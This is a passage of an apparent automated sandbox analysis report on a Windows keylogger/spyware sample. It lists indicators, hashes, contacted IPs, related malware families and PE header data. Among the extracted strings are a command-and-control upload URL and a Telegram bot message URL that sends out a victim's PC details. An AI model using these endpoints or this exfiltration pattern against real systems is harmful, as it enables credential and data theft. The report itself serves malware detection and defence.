                                                                      http://checkip.dyndns.org/q5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 00000004.00000002.2545353858.0000000002C0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.orgInstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20aInstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        api.telegram.orgUnited Kingdom
                                                                                        62041TELEGRAMRUfalse
                                                                                        104.21.112.1
                                                                                        reallyfreegeoip.orgUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        158.101.44.242
                                                                                        checkip.dyndns.comUnited States
                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1588845
                                                                                        Start date and time:2025-01-11 06:12:32 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 51s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:5qJ6QQTcRS.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 97%
                                                                                        • Number of executed functions: 231
                                                                                        • Number of non-executed functions: 38
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.12.23.50
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target InstallUtil.exe, PID 8132 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        TimeTypeDescription
                                                                                        00:13:28API Interceptor53450x Sleep call for process: 5qJ6QQTcRS.exe modified
                                                                                        00:14:34API Interceptor39634x Sleep call for process: InstallUtil.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.2204NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                        TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            104.21.112.1BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.kkpmoneysocial.top/86am/
                                                                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.buyspeechst.shop/qzi3/
                                                                                                            QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.buyspeechst.shop/w98i/
                                                                                                            wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                            • beammp.com/phpmyadmin/
                                                                                                            158.101.44.242prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            checkip.dyndns.comprgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 132.226.8.169
                                                                                                            reallyfreegeoip.orgprgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.16.1
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.48.1
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.48.1
                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.80.1
                                                                                                            api.telegram.org4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRU4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ORACLE-BMC-31898USprgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            CLOUDFLARENETUShttps://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                            • 172.64.155.59
                                                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.86.111
                                                                                                            1507513743282749438.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 162.159.61.3
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            C6Abn5cBei.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.15.100
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adprgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\5qJ6QQTcRS.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                                                                            MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                                                                            SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                                                                            SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                                                                            SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                                                                            Malicious:true
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.032184003707178
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:5qJ6QQTcRS.exe
                                                                                                            File size:838'144 bytes
                                                                                                            MD5:78668d52e5b092184a4b8e6788713b3c
                                                                                                            SHA1:302e6b4b4f6441acbbfe4e55c6f6d8a83d94f7eb
                                                                                                            SHA256:e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c
                                                                                                            SHA512:268bc3599a5cdf1ca28718a460a8fd6c9b3de7f76b5ea59bbf2e9956464c54c8a7b80c0fd1cc788a9c3bc1dad10527c35d953dff9a59df9a3e88a629b8b419ca
                                                                                                            SSDEEP:12288:yjvtDL3M7b58soVv4mRPVg5MCao3AiqLwgDS7P2P:yjvV3Mn2jgyo3A9Lu7PO
                                                                                                            TLSH:CF05E0107354ED79F8B800329B70C7F642ADEE0644B7569F486E7A97BCBC2163AF2494
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,......................>........... ........@.. ....................... ............`................................
                                                                                                            Icon Hash:74f0d4d4d4d4d4cc
                                                                                                            Entrypoint:0x4ba9be
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x112C0316 [Sat Feb 17 10:57:26 1979 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba9680x53.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x13ac8.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xb89c40xb8a00011a1ed1c3deadd8bbf692a003c6ab16False0.6490087593094109DIY-Thermocam raw data (Lepton 2.x), scale 0-9472, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 1103944034025472.0000007.081769071361407IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
